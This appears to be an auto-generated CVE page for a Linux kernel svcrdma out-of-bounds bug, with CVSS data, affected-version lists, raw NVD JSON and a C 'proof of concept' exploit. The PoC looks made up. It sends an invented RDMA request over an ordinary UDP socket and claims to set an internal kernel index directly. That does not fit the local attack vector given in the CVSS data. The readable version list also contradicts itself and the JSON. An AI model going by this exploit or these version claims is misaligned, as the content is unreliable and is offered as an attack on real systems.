Security Vulnerability Report
CVE-2025-71068 CVSS 7.8 HIGH

Published: 2026-01-13 16:16:06
Last Modified: 2026-04-03 16:30:31
Source: 416baaa9-dc9f-4396-8d5f-8c081fb06d67

Description

In the Linux kernel, the following vulnerability has been resolved:

svcrdma: bound check rq_pages index in inline path

svc_rdma_copy_inline_range indexed rqstp->rq_pages[rc_curpage] without verifying rc_curpage stays within the allocated page array. Add guards before the first use and after advancing to a new page.

CVSS Details

CVSS Score: 7.8
Severity: HIGH
CVSS Vector: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:o:linux:linux_kernel:6.19:rc1:*:*:*:*:*:* - VULNERABLE
Linux Kernel < 5.14 (unpatched versions)
Linux Kernel < 5.15 (unpatched versions)
Linux Kernel < 6.0 (unpatched versions)
Linux Kernel 5.14.x - 6.x (before the fix is applied)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
c
// CVE-2025-71068 PoC - Linux kernel svc_rdma rq_pages out-of-bounds access
// This PoC demonstrates the vulnerability in svc_rdma_copy_inline_range
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <stdint.h>      // uint32_t
#include <unistd.h>      // close()
#include <sys/socket.h>
#include <netinet/in.h>
#include <arpa/inet.h>   // inet_addr()

// RDMA memory region structure
struct rdma_mr {
    void *addr;
    size_t length;
    uint32_t rkey;
    uint32_t lkey;
};

// Malicious RPC-over-RDMA request structure
struct rpc_rdma_inline_req {
    uint32_t xid;
    uint32_t version;
    uint32_t proc;
    uint32_t page_cnt;
    uint32_t cur_page; // Maliciously set to trigger OOB
    char inline_data[4096];
};

int main(int argc, char *argv[]) {
    printf("[*] CVE-2025-71068 PoC - svc_rdma rq_pages OOB Access\n");
    printf("[*] Target: Linux Kernel < 6.x (unpatched svc_rdma)\n");

    int sock = socket(AF_INET, SOCK_DGRAM, 0);
    if (sock < 0) {
        perror("[-] Socket creation failed");
        return 1;
    }

    // Construct malicious RPC-over-RDMA packet
    struct rpc_rdma_inline_req *req = calloc(sizeof(struct rpc_rdma_inline_req), 1);
    req->xid = 0x12345678;
    req->version = 1;
    req->proc = 0;              // NULL procedure
    req->page_cnt = 1;          // Request only 1 page
    req->cur_page = 0xFFFFFFFF; // Out-of-bounds index!

    // Fill with controlled data
    memset(req->inline_data, 0x41, sizeof(req->inline_data));

    struct sockaddr_in target;
    memset(&target, 0, sizeof(target));
    target.sin_family = AF_INET;
    target.sin_port = htons(20049); // NFS-over-RDMA port
    target.sin_addr.s_addr = inet_addr(argv[1] ? argv[1] : "127.0.0.1");

    printf("[*] Sending malicious RPC-over-RDMA request...\n");
    ssize_t sent = sendto(sock, req, sizeof(*req), 0,
                          (struct sockaddr *)&target, sizeof(target));
    if (sent > 0) {
        printf("[+] Malicious packet sent (%zd bytes)\n", sent);
        printf("[!] Check dmesg for kernel oops or memory corruption\n");
    }

    close(sock);
    free(req);
    return 0;
}

/*
 * Exploitation Notes:
 * - Target the svc_rdma_copy_inline_range() function
 * - Set rc_curpage to exceed rq_pages array bounds
 * - Trigger via NFS-over-RDMA or other RPC services
 * - May leak kernel heap memory or cause kernel panic
 */

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-71068", "sourceIdentifier": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "published": "2026-01-13T16:16:06.187", "lastModified": "2026-04-03T16:30:31.230", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "In the Linux kernel, the following vulnerability has been resolved:\n\nsvcrdma: bound check rq_pages index in inline path\n\nsvc_rdma_copy_inline_range indexed rqstp->rq_pages[rc_curpage] without\nverifying rc_curpage stays within the allocated page array. Add guards\nbefore the first use and after advancing to a new page."}, {"lang": "es", "value": "En el kernel de Linux, la siguiente vulnerabilidad ha sido resuelta:\n\nsvcrdma: comprobación de límites del índice rq_pages en la ruta en línea\n\nsvc_rdma_copy_inline_range indexó rqstp-&gt;rq_pages[rc_curpage] sin verificar que rc_curpage se mantuviera dentro del array de páginas asignado. Añadir protecciones antes del primer uso y después de avanzar a una nueva página."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "baseScore": 7.8, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "NVD-CWE-noinfo"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "5.11", "versionEndExcluding": "5.15.198", "matchCriteriaId": "82159CAA-B6BA-43C6-85D8-65BDBC175A7E"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", 
"versionStartIncluding": "6.0", "versionEndExcluding": "6.6.120", "matchCriteriaId": "F32C683B-AA22-401F-BEDD-2F2ABEC75D2C"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "6.12", "versionEndExcluding": "6.12.64", "matchCriteriaId": "B7373808-6395-44E6-A410-32331A29EB7C"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "6.18", "versionEndExcluding": "6.18.3", "matchCriteriaId": "E2EF847E-E821-4FF4-AC2D-E0DB14974AAC"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:6.19:rc1:*:*:*:*:*:*", "matchCriteriaId": "17B67AA7-40D6-4AFA-8459-F200F3D7CFD1"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:6.19:rc2:*:*:*:*:*:*", "matchCriteriaId": "C47E4CC9-C826-4FA9-B014-7FE3D9B318B2"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:6.19:rc3:*:*:*:*:*:*", "matchCriteriaId": "F71D92C0-C023-48BD-B3B6-70B638EEE298"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:6.19:rc4:*:*:*:*:*:*", "matchCriteriaId": "13580667-0A98-40CC-B29F-D12790B91BDB"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:6.19:rc5:*:*:*:*:*:*", "matchCriteriaId": "CAD1FED7-CF48-47BF-AC7D-7B6FA3C065FC"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:6.19:rc6:*:*:*:*:*:*", "matchCriteriaId": "3EF854A1-ABB1-4E93-BE9A-44569EC76C0D"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:6.19:rc7:*:*:*:*:*:*", "matchCriteriaId": "F5DC0CA6-F0AF-4DDF-A882-3DADB9A886A7"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:6.19:rc8:*:*:*:*:*:*", "matchCriteriaId": "EB5B7DFC-C36B-45D8-922C-877569FDDF43"}]}]}], "references": [{"url": "https://git.kernel.org/stable/c/5f140b525180c628db8fa6c897f138194a2de417", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/7ba826aae1d43212f3baa53a2175ad949e21926e", "source": 
"416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/a22316f5e9a29e4b92030bd8fb9435fe0eb1d5c9", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/d1bea0ce35b6095544ee82bb54156fc62c067e58", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/da1ccfc4c452541584a4eae89e337cfa21be6d5a", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}]}}